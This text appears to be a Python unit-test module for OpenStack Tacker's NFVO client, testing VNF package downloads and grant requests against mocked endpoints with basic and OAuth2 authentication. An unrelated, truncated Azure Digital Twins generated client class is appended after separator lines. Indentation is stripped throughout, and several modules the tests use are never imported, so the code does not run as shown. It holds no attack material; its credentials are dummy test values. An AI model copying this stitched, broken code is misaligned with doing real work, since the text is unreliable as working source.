import shutil
import tempfile
import uuid
import zipfile
import ddt
from oslo_config import cfg
from requests_mock.contrib import fixture as requests_mock_fixture
from tacker import auth
from tacker.tests import base
from tacker.tests.unit.vnfm.infra_drivers.openstack.fixture_data import client
from tacker.tests.unit.vnfpkgm import fakes
from tacker.tests import utils
from tacker.tests import uuidsentinel
import tacker.vnfm.nfvo_client as nfvo_client
from unittest import mock
def _count_mock_history(history, *url):
req_count = 0
for mock_history in history:
actual_url = '{}://{}'.format(mock_history.scheme,
mock_history.hostname)
if actual_url in url:
req_count += 1
return req_count
@ddt.ddt
class TestVnfPackageRequest(base.BaseTestCase):
client_fixture_class = client.ClientFixture
sdk_connection_fixure_class = client.SdkConnectionFixture
def setUp(self):
super(TestVnfPackageRequest, self).setUp()
self.requests_mock = self.useFixture(requests_mock_fixture.Fixture())
self.url = "http://nfvo.co.jp/vnfpkgm/v1/vnf_packages"
self.nfvo_url = "http://nfvo.co.jp"
self.test_package_dir = 'tacker/tests/unit/vnfm/'
self.headers = {'Content-Type': 'application/json'}
self.token_endpoint = 'https://oauth2/tokens'
self.oauth_url = 'https://oauth2'
self.auth_user_name = 'test_user'
self.auth_password = 'test_password'
cfg.CONF.set_override('auth_type', None,
group='authentication')
cfg.CONF.set_override(
"base_url",
self.url,
group='connect_vnf_packages')
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=[
"package_content",
"vnfd"])
cfg.CONF.set_override('user_name', self.auth_user_name,
group='authentication')
cfg.CONF.set_override('password', self.auth_password,
group='authentication')
cfg.CONF.set_override('token_endpoint', self.token_endpoint,
group='authentication')
cfg.CONF.set_override('client_id', self.auth_user_name,
group='authentication')
cfg.CONF.set_override('client_password', self.auth_password,
group='authentication')
auth.auth_manager = auth._AuthManager()
nfvo_client.VnfPackageRequest._connector = nfvo_client._Connect(
2, 1, 20)
def tearDown(self):
super(TestVnfPackageRequest, self).tearDown()
self.addCleanup(mock.patch.stopall)
def assert_auth_basic(self, actual_request):
actual_auth = actual_request._request.headers.get("Authorization")
expected_auth = base64.b64encode(
'{}:{}'.format(
self.auth_user_name,
self.auth_password).encode('utf-8')).decode()
self.assertEqual("Basic " + expected_auth, actual_auth)
def assert_auth_client_credentials(self, actual_request, expected_token):
actual_auth = actual_request._request.headers.get(
"Authorization")
self.assertEqual("Bearer " + expected_token, actual_auth)
def assert_zipfile(
self,
actual_zip,
expected_zips,
expected_artifacts=None):
expected_artifacts = expected_artifacts if expected_artifacts else []
def check_zip(expected_zip):
self.assertIsInstance(expected_zip, zipfile.ZipFile)
for expected_name in expected_zip.namelist():
expected_checksum = hashlib.sha256(
expected_zip.read(expected_name)).hexdigest()
actual_checksum = hashlib.sha256(
actual_zip.read(expected_name)).hexdigest()
self.assertEqual(expected_checksum, actual_checksum)
try:
self.assertIsInstance(actual_zip, zipfile.ZipFile)
self.assertIsNone(actual_zip.testzip())
expected_elm_cnt = sum(
map(lambda x: len(x.namelist()), expected_zips))
self.assertEqual(expected_elm_cnt +
len(expected_artifacts), len(actual_zip.namelist()))
for expected_zip in expected_zips:
check_zip(expected_zip)
for expected_artifact in expected_artifacts:
expected_checksum = hashlib.sha256(
open(expected_artifact, 'rb').read()).hexdigest()
actual_checksum = hashlib.sha256(
actual_zip.read(expected_artifact)).hexdigest()
self.assertEqual(expected_checksum, actual_checksum)
except Exception as e:
self.fail(e)
def json_serial_date_to_dict(self, json_obj):
def json_serial(obj):
if isinstance(obj, datetime.datetime):
return obj.isoformat()
raise TypeError("Type %s not serializable" % type(obj))
serial_json_str = json.dumps(json_obj, default=json_serial)
return json.loads(serial_json_str)
def test_init(self):
self.assertEqual(self.url, cfg.CONF.connect_vnf_packages.base_url)
self.assertEqual(["package_content", "vnfd"],
cfg.CONF.connect_vnf_packages.pipeline)
self.assertEqual(2, cfg.CONF.connect_vnf_packages.retry_num)
self.assertEqual(30, cfg.CONF.connect_vnf_packages.retry_wait)
self.assertEqual(20, cfg.CONF.connect_vnf_packages.timeout)
def _make_zip_file_from_sample(self, dir_name, read_vnfd_only=False):
unique_name = str(uuid.uuid4())
temp_dir = os.path.join('/tmp', unique_name)
utils.copy_csar_files(temp_dir, dir_name, read_vnfd_only)
tempfd, temp_filepath = tempfile.mkstemp(suffix=".zip", dir=temp_dir)
os.close(tempfd)
zipfile.ZipFile(temp_filepath, 'w')
self.addCleanup(shutil.rmtree, temp_dir)
return temp_filepath
@ddt.data({'content': 'vnfpkgm1',
'vnfd': None,
'artifacts': None},
{'content': None,
'vnfd': 'vnfpkgm2',
'artifacts': None},
{'content': None,
'vnfd': None,
'artifacts': ["vnfd_lcm_user_data.yaml"]},
{'content': 'vnfpkgm1',
'vnfd': 'vnfpkgm2',
'artifacts': ["vnfd_lcm_user_data.yaml"]},
{'content': 'vnfpkgm1',
'vnfd': None,
'artifacts': None},
{'content': None,
'vnfd': 'vnfpkgm2',
'artifacts': ["vnfd_lcm_user_data.yaml"]},
{'content': 'vnfpkgm1',
'vnfd': 'vnfpkgm2',
'artifacts': ["vnfd_lcm_user_data.yaml"]},
)
@ddt.unpack
def test_download_vnf_packages(self, content, vnfd, artifacts):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
expected_connect_cnt = 0
pipelines = []
if content:
expected_connect_cnt += 1
pipelines.append('package_content')
path = self._make_zip_file_from_sample(content)
with open(path, 'rb') as test_package_content_zip_obj:
expected_package_content_zip = zipfile.ZipFile(
io.BytesIO(test_package_content_zip_obj.read()))
test_package_content_zip_obj.seek(0)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'package_content'),
content=test_package_content_zip_obj.read(),
headers={
'Content-Type': 'application/zip'},
status_code=200)
if vnfd:
expected_connect_cnt += 1
pipelines.append('vnfd')
path = self._make_zip_file_from_sample(vnfd, read_vnfd_only=True)
with open(path, 'rb') as test_vnfd_zip_obj:
expected_vnfd_zip = zipfile.ZipFile(
io.BytesIO(test_vnfd_zip_obj.read()))
test_vnfd_zip_obj.seek(0)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'vnfd'),
content=test_vnfd_zip_obj.read(),
headers={
'Content-Type': 'application/zip'},
status_code=200)
if artifacts:
pipelines.append('artifacts')
artifacts = [os.path.join("tacker/tests/etc/samples", p)
for p in artifacts]
for artifact_path in artifacts:
expected_connect_cnt += 1
with open(artifact_path, 'rb') as artifact_path_obj:
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'artifacts',
artifact_path),
headers={
'Content-Type': 'application/octet-stream'},
status_code=200,
content=artifact_path_obj.read())
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=pipelines)
if artifacts:
res = nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id, artifacts)
else:
res = nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertIsInstance(res, io.BytesIO)
actual_zip = zipfile.ZipFile(res)
if content and vnfd:
self.assert_zipfile(
actual_zip, [
expected_package_content_zip,
expected_vnfd_zip],
artifacts)
elif content:
self.assert_zipfile(
actual_zip, [expected_package_content_zip], artifacts)
elif vnfd:
self.assert_zipfile(
actual_zip, [expected_vnfd_zip], artifacts)
else:
self.assert_zipfile(
actual_zip, [], artifacts)
self.assertEqual(expected_connect_cnt, req_count)
def test_download_vnf_packages_with_auth_basic(self):
cfg.CONF.set_override('auth_type', 'BASIC',
group='authentication')
auth.auth_manager = auth._AuthManager()
expected_connect_cnt = \
self._download_vnf_packages_all_pipeline_with_assert()
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(expected_connect_cnt, req_count)
for h in history:
self.assert_auth_basic(h)
def test_download_vnf_packages_with_auth_client_credentials(self):
cfg.CONF.set_override('auth_type', 'OAUTH2_CLIENT_CREDENTIALS',
group='authentication')
expected_connect_cnt = 1
self.requests_mock.register_uri('POST',
self.token_endpoint,
json={'access_token': 'test_token', 'token_type': 'bearer'},
headers={'Content-Type': 'application/json'},
status_code=200)
auth.auth_manager = auth._AuthManager()
expected_connect_cnt += \
self._download_vnf_packages_all_pipeline_with_assert()
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url, self.oauth_url)
self.assertEqual(expected_connect_cnt, req_count)
self.assert_auth_basic(history[0])
for h in history[1:]:
self.assert_auth_client_credentials(h, "test_token")
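    # Note (added for clarity, not in the original tests): with
    # OAUTH2_CLIENT_CREDENTIALS the first recorded request is the token
    # request itself, sent with HTTP Basic credentials built from
    # client_id/client_password, and every later NFVO request carries
    # "Bearer test_token" taken from the mocked token response. That is why
    # history[0] is checked with assert_auth_basic and the remaining entries
    # with assert_auth_client_credentials.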
def _download_vnf_packages_all_pipeline_with_assert(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
expected_connect_cnt = 0
pipelines = []
content = 'vnfpkgm1'
expected_connect_cnt += 1
pipelines.append('package_content')
path = self._make_zip_file_from_sample(content)
with open(path, 'rb') as test_package_content_zip_obj:
expected_package_content_zip = zipfile.ZipFile(
io.BytesIO(test_package_content_zip_obj.read()))
test_package_content_zip_obj.seek(0)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'package_content'),
content=test_package_content_zip_obj.read(),
headers={
'Content-Type': 'application/zip'},
status_code=200)
vnfd = 'vnfpkgm2'
expected_connect_cnt += 1
pipelines.append('vnfd')
path = self._make_zip_file_from_sample(vnfd, read_vnfd_only=True)
with open(path, 'rb') as test_vnfd_zip_obj:
expected_vnfd_zip = zipfile.ZipFile(
io.BytesIO(test_vnfd_zip_obj.read()))
test_vnfd_zip_obj.seek(0)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'vnfd'),
content=test_vnfd_zip_obj.read(),
headers={
'Content-Type': 'application/zip'},
status_code=200)
artifacts = ["vnfd_lcm_user_data.yaml"]
pipelines.append('artifacts')
artifacts = [os.path.join("tacker/tests/etc/samples", p)
for p in artifacts]
for artifact_path in artifacts:
expected_connect_cnt += 1
with open(artifact_path, 'rb') as artifact_path_obj:
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'artifacts',
artifact_path),
headers={
'Content-Type': 'application/octet-stream'},
status_code=200,
content=artifact_path_obj.read())
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=pipelines)
res = nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id, artifacts)
self.assertIsInstance(res, io.BytesIO)
actual_zip = zipfile.ZipFile(res)
self.assert_zipfile(
actual_zip, [
expected_package_content_zip,
expected_vnfd_zip], artifacts)
return expected_connect_cnt
def test_download_vnf_packages_content_disposition(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
test_yaml_filepath = os.path.join(
'tacker/tests/etc/samples',
'vnfd_lcm_user_data.yaml')
with open(test_yaml_filepath, 'rb') as test_yaml_obj:
headers = {
'Content-Type': 'application/octet-stream',
'Content-Disposition':
'filename={}'.format(test_yaml_filepath)}
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'vnfd'),
content=test_yaml_obj.read(),
headers=headers,
status_code=200)
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=['vnfd'])
res = nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
self.assertIsInstance(res, io.BytesIO)
actual_zip = zipfile.ZipFile(res)
self.assert_zipfile(actual_zip, [], [test_yaml_filepath])
def test_download_vnf_packages_non_content_disposition_raise_download(
self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
test_yaml_filepath = os.path.join(
'tacker/tests/etc/samples',
'vnfd_lcm_user_data.yaml')
with open(test_yaml_filepath, 'rb') as test_yaml_obj:
headers = {'Content-Type': 'application/octet-stream'}
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'vnfd'),
content=test_yaml_obj.read(),
headers=headers,
status_code=200)
cfg.CONF.set_default(
name='pipeline',
group='connect_vnf_packages',
default=['vnfd'])
self.assertRaises(
nfvo_client.FaliedDownloadContentException,
nfvo_client.VnfPackageRequest.download_vnf_packages,
uuidsentinel.vnf_pkg_id)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
def test_download_vnf_packages_with_retry_raise_not_found(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'package_content'),
headers=self.headers,
status_code=404)
try:
nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id)
except requests.exceptions.RequestException as e:
self.assertEqual(404, e.response.status_code)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_vnf_packages.retry_num + 1, req_count)
def test_download_vnf_packages_with_retry_raise_timeout(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
self.requests_mock.register_uri(
'GET',
os.path.join(
fetch_base_url,
'package_content'),
exc=requests.exceptions.ConnectTimeout)
try:
nfvo_client.VnfPackageRequest.download_vnf_packages(
uuidsentinel.vnf_pkg_id)
except requests.exceptions.RequestException as e:
self.assertIsNone(e.response)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_vnf_packages.retry_num + 1, req_count)
def test_download_vnf_packages_raise_failed_download_content(self):
fetch_base_url = os.path.join(self.url, uuidsentinel.vnf_pkg_id)
self.requests_mock.register_uri('GET', os.path.join(
fetch_base_url, 'package_content'), content=None)
self.assertRaises(
nfvo_client.FaliedDownloadContentException,
nfvo_client.VnfPackageRequest.download_vnf_packages,
uuidsentinel.vnf_pkg_id)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
@ddt.data(None, "", " ")
def test_download_vnf_packages_raise_non_baseurl(self, empty_val):
cfg.CONF.set_override("base_url", empty_val,
group='connect_vnf_packages')
self.assertRaises(
nfvo_client.UndefinedExternalSettingException,
nfvo_client.VnfPackageRequest.download_vnf_packages,
uuidsentinel.vnf_pkg_id)
@ddt.data(None, [], ["non"])
def test_download_vnf_packages_raise_non_pipeline(self, empty_val):
cfg.CONF.set_override('pipeline', empty_val,
group='connect_vnf_packages')
self.assertRaises(
nfvo_client.UndefinedExternalSettingException,
nfvo_client.VnfPackageRequest.download_vnf_packages,
uuidsentinel.vnf_pkg_id)
def test_index(self):
response_body = self.json_serial_date_to_dict(
[fakes.VNFPACKAGE_RESPONSE, fakes.VNFPACKAGE_RESPONSE])
self.requests_mock.register_uri(
'GET', self.url, headers=self.headers, json=response_body)
res = nfvo_client.VnfPackageRequest.index()
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), list)
self.assertEqual(response_body, res.json())
self.assertEqual(2, len(res.json()))
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
def test_index_with_auth_basic(self):
cfg.CONF.set_override('auth_type', 'BASIC',
group='authentication')
auth.auth_manager = auth._AuthManager()
response_body = self.json_serial_date_to_dict(
[fakes.VNFPACKAGE_RESPONSE, fakes.VNFPACKAGE_RESPONSE])
self.requests_mock.register_uri(
'GET', self.url, headers=self.headers, json=response_body)
res = nfvo_client.VnfPackageRequest.index()
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), list)
self.assertEqual(response_body, res.json())
self.assertEqual(2, len(res.json()))
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
self.assert_auth_basic(history[0])
def test_index_with_auth_client_credentials(self):
cfg.CONF.set_override('auth_type', 'OAUTH2_CLIENT_CREDENTIALS',
group='authentication')
self.requests_mock.register_uri('POST',
self.token_endpoint,
json={'access_token': 'test_token', 'token_type': 'bearer'},
headers={'Content-Type': 'application/json'},
status_code=200)
auth.auth_manager = auth._AuthManager()
response_body = self.json_serial_date_to_dict(
[fakes.VNFPACKAGE_RESPONSE, fakes.VNFPACKAGE_RESPONSE])
self.requests_mock.register_uri(
'GET', self.url, headers=self.headers, json=response_body)
res = nfvo_client.VnfPackageRequest.index()
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), list)
self.assertEqual(response_body, res.json())
self.assertEqual(2, len(res.json()))
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url, self.oauth_url)
self.assertEqual(2, req_count)
self.assert_auth_basic(history[0])
self.assert_auth_client_credentials(history[1], "test_token")
def test_index_raise_not_found(self):
self.requests_mock.register_uri(
'GET', self.url, headers=self.headers, status_code=404)
try:
nfvo_client.VnfPackageRequest.index()
except requests.exceptions.RequestException as e:
self.assertEqual(404, e.response.status_code)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_vnf_packages.retry_num + 1, req_count)
def test_index_raise_non_baseurl(self):
cfg.CONF.set_override("base_url", None,
group='connect_vnf_packages')
self.assertRaises(nfvo_client.UndefinedExternalSettingException,
nfvo_client.VnfPackageRequest.index)
def test_show(self):
response_body = self.json_serial_date_to_dict(
fakes.VNFPACKAGE_RESPONSE)
self.requests_mock.register_uri(
'GET',
os.path.join(
self.url,
uuidsentinel.vnf_pkg_id),
headers=self.headers,
json=response_body)
res = nfvo_client.VnfPackageRequest.show(uuidsentinel.vnf_pkg_id)
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), dict)
self.assertEqual(response_body, res.json())
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
def test_show_with_auth_basic(self):
cfg.CONF.set_override('auth_type', 'BASIC',
group='authentication')
auth.auth_manager = auth._AuthManager()
response_body = self.json_serial_date_to_dict(
fakes.VNFPACKAGE_RESPONSE)
self.requests_mock.register_uri(
'GET',
os.path.join(
self.url,
uuidsentinel.vnf_pkg_id),
headers=self.headers,
json=response_body)
res = nfvo_client.VnfPackageRequest.show(uuidsentinel.vnf_pkg_id)
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), dict)
self.assertEqual(response_body, res.json())
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
self.assert_auth_basic(history[0])
def test_show_with_auth_client_credentials(self):
cfg.CONF.set_override('auth_type', 'OAUTH2_CLIENT_CREDENTIALS',
group='authentication')
self.requests_mock.register_uri('POST',
self.token_endpoint,
json={'access_token': 'test_token', 'token_type': 'bearer'},
headers={'Content-Type': 'application/json'},
status_code=200)
auth.auth_manager = auth._AuthManager()
response_body = self.json_serial_date_to_dict(
fakes.VNFPACKAGE_RESPONSE)
self.requests_mock.register_uri(
'GET',
os.path.join(
self.url,
uuidsentinel.vnf_pkg_id),
headers=self.headers,
json=response_body)
res = nfvo_client.VnfPackageRequest.show(uuidsentinel.vnf_pkg_id)
self.assertEqual(200, res.status_code)
self.assertIsInstance(res.json(), dict)
self.assertEqual(response_body, res.json())
self.assertEqual(response_body, json.loads(res.text))
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url, self.oauth_url)
self.assertEqual(2, req_count)
self.assert_auth_basic(history[0])
self.assert_auth_client_credentials(history[1], "test_token")
def test_show_raise_not_found(self):
self.requests_mock.register_uri(
'GET',
os.path.join(
self.url,
uuidsentinel.vnf_pkg_id),
headers=self.headers,
status_code=404)
try:
nfvo_client.VnfPackageRequest.show(uuidsentinel.vnf_pkg_id)
except requests.exceptions.RequestException as e:
self.assertEqual(404, e.response.status_code)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_vnf_packages.retry_num + 1, req_count)
def test_show_raise_non_baseurl(self):
cfg.CONF.set_override("base_url", None,
group='connect_vnf_packages')
self.assertRaises(nfvo_client.UndefinedExternalSettingException,
nfvo_client.VnfPackageRequest.show,
uuidsentinel.vnf_pkg_id)
@ddt.ddt
class TestGrantRequest(base.BaseTestCase):
def setUp(self):
super(TestGrantRequest, self).setUp()
self.requests_mock = self.useFixture(requests_mock_fixture.Fixture())
self.url = "http://nfvo.co.jp/grant/v1/grants"
self.nfvo_url = 'http://nfvo.co.jp'
self.headers = {'content-type': 'application/json'}
self.token_endpoint = 'https://oauth2/tokens'
self.oauth_url = 'https://oauth2'
self.auth_user_name = 'test_user'
self.auth_password = 'test_password'
cfg.CONF.set_override('auth_type', None,
group='authentication')
cfg.CONF.set_override("base_url", self.url, group='connect_grant')
cfg.CONF.set_override('user_name', self.auth_user_name,
group='authentication')
cfg.CONF.set_override('password', self.auth_password,
group='authentication')
cfg.CONF.set_override('token_endpoint', self.token_endpoint,
group='authentication')
cfg.CONF.set_override('client_id', self.auth_user_name,
group='authentication')
cfg.CONF.set_override('client_password', self.auth_password,
group='authentication')
auth.auth_manager = auth._AuthManager()
nfvo_client.GrantRequest._connector = nfvo_client._Connect(2, 1, 20)
def tearDown(self):
super(TestGrantRequest, self).tearDown()
self.addCleanup(mock.patch.stopall)
    def assert_auth_basic(self, actual_request):
        actual_auth = actual_request._request.headers.get("Authorization")
expected_auth = base64.b64encode(
'{}:{}'.format(
self.auth_user_name,
self.auth_password).encode('utf-8')).decode()
self.assertEqual("Basic " + expected_auth, actual_auth)
    def assert_auth_client_credentials(self, actual_request, expected_token):
        actual_auth = actual_request._request.headers.get(
            "Authorization")
self.assertEqual("Bearer " + expected_token, actual_auth)
def create_request_body(self):
return {
"vnfInstanceId": uuidsentinel.vnf_instance_id,
"vnfLcmOpOccId": uuidsentinel.vnf_lcm_op_occ_id,
"operation": "INST",
"isAutomaticInvocation": False,
"links": {
"vnfLcmOpOcc": {
"href":
"https://localost/vnfm/vnflcm/v1/vnf_lcm_op_occs/" +
uuidsentinel.vnf_lcm_op_occ_id},
"vnfInstance": {
"href": "https://localost/vnfm/vnflcm/v1/vnf_instances/" +
uuidsentinel.vnf_instance_id}}}
def fake_response_body(self):
return {
"id": uuidsentinel.grant_id,
"vnfInstanceId": uuidsentinel.vnf_instance_id,
"vnfLcmOpOccId": uuidsentinel.vnf_lcm_op_occ_id,
"additionalParams": {},
"_links": {
"self": {
"href":
"http://nfvo.co.jp/grant/v1/grants/\
19533fd4-eacb-4e6f-acd9-b56210a180d7"},
"vnfLcmOpOcc": {
"href":
"https://localost/vnfm/vnflcm/v1/vnf_lcm_op_occs/" +
uuidsentinel.vnf_lcm_op_occ_id},
"vnfInstance": {
"href": "https://localost/vnfm/vnflcm/v1/vnf_instances/" +
uuidsentinel.vnf_instance_id}}}
def test_init(self):
self.assertEqual(self.url, cfg.CONF.connect_grant.base_url)
self.assertEqual(2, cfg.CONF.connect_grant.retry_num)
self.assertEqual(30, cfg.CONF.connect_grant.retry_wait)
self.assertEqual(20, cfg.CONF.connect_grant.timeout)
def test_grants(self):
response_body = self.fake_response_body()
self.requests_mock.register_uri(
'POST',
self.url,
json=response_body,
headers=self.headers,
status_code=201)
request_body = self.create_request_body()
res = nfvo_client.GrantRequest.grants(data=request_body)
self.assertEqual(response_body, json.loads(res.text))
self.assertEqual(response_body, res.json())
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
def test_grants_with_retry_raise_bad_request(self):
response_body = self.fake_response_body()
self.requests_mock.register_uri('POST', self.url, json=json.dumps(
response_body), headers=self.headers, status_code=400)
request_body = self.create_request_body()
try:
nfvo_client.GrantRequest.grants(data=request_body)
except requests.exceptions.RequestException as e:
self.assertEqual(400, e.response.status_code)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_grant.retry_num + 1, req_count)
def test_grants_with_retry_raise_timeout(self):
self.requests_mock.register_uri(
'POST', self.url, exc=requests.exceptions.ConnectTimeout)
request_body = self.create_request_body()
try:
nfvo_client.GrantRequest.grants(data=request_body)
except requests.exceptions.RequestException as e:
self.assertIsNone(e.response)
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(
cfg.CONF.connect_grant.retry_num + 1, req_count)
@ddt.data(None, "", " ")
def test_grants_raise_non_baseurl(self, empty_val):
cfg.CONF.set_override("base_url", empty_val, group='connect_grant')
self.assertRaises(nfvo_client.UndefinedExternalSettingException,
nfvo_client.GrantRequest.grants,
data={"test": "value1"})
def test_grants_with_auth_basic(self):
cfg.CONF.set_override('auth_type', 'BASIC',
group='authentication')
auth.auth_manager = auth._AuthManager()
response_body = self.fake_response_body()
self.requests_mock.register_uri(
'POST',
self.url,
json=response_body,
headers=self.headers,
status_code=201)
request_body = self.create_request_body()
res = nfvo_client.GrantRequest.grants(data=request_body)
self.assertEqual(response_body, json.loads(res.text))
self.assertEqual(response_body, res.json())
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url)
self.assertEqual(1, req_count)
self.assert_auth_basic(history[0])
def test_grants_with_auth_client_credentials(self):
cfg.CONF.set_override('auth_type', 'OAUTH2_CLIENT_CREDENTIALS',
group='authentication')
self.requests_mock.register_uri('POST',
self.token_endpoint,
json={'access_token': 'test_token', 'token_type': 'bearer'},
headers={'Content-Type': 'application/json'},
status_code=200)
auth.auth_manager = auth._AuthManager()
response_body = self.fake_response_body()
self.requests_mock.register_uri(
'POST',
self.url,
json=response_body,
headers=self.headers,
status_code=201)
request_body = self.create_request_body()
res = nfvo_client.GrantRequest.grants(data=request_body)
self.assertEqual(response_body, json.loads(res.text))
self.assertEqual(response_body, res.json())
history = self.requests_mock.request_history
req_count = _count_mock_history(history, self.nfvo_url, self.oauth_url)
self.assertEqual(2, req_count)
self.assert_auth_basic(history[0])
self.assert_auth_client_credentials(history[1], "test_token")
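# Illustrative sketch (added for clarity, not part of the original test
# module): the assertions above rely on requests-mock recording every HTTP
# call in ``request_history`` so the tests can count how many requests hit
# the fake NFVO and OAuth endpoints. A minimal, self-contained example of
# that pattern, using only the public requests-mock API, is shown below.
# The URL and the _example_count_by_host helper are hypothetical and are not
# the module's own _count_mock_history helper.
def _example_request_history_counting():
    import requests
    import requests_mock
    with requests_mock.Mocker() as m:
        m.register_uri('GET', 'http://nfvo.example/v1/resource',
                       json={'ok': True}, status_code=200)
        requests.get('http://nfvo.example/v1/resource')
        requests.get('http://nfvo.example/v1/resource')
        def _example_count_by_host(history, host):
            # Count recorded requests whose URL starts with the given host.
            return sum(1 for req in history if req.url.startswith(host))
        return _example_count_by_host(m.request_history, 'http://nfvo.example')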
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class EventRoutesOperations(object):
"""EventRoutesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.digitaltwins.core.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
event_routes_list_options=None, # type: Optional["_models.EventRoutesListOptions"]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.EventRouteCollection"]
"""Retrieves all event routes.
Status codes:
* 200 OK.
:param event_routes_list_options: Parameter group.
:type event_routes_list_options: ~azure.digitaltwins.core.models.EventRoutesListOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either EventRouteCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.digitaltwins.core.models.EventRouteCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.EventRouteCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_traceparent = None
_tracestate = None
_max_items_per_page = None
if event_routes_list_options is not None:
_traceparent = event_routes_list_options.traceparent
_tracestate = event_routes_list_options.tracestate
_max_items_per_page = event_routes_list_options.max_items_per_page
api_version = "2020-10-31"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _traceparent is not None:
header_parameters['traceparent'] = self._serialize.header("traceparent", _traceparent, 'str')
if _tracestate is not None:
header_parameters['tracestate'] = self._serialize.header("tracestate", _tracestate, 'str')
if _max_items_per_page is not None:
header_parameters['max-items-per-page'] = self._serialize.header("max_items_per_page", _max_items_per_page, 'int')
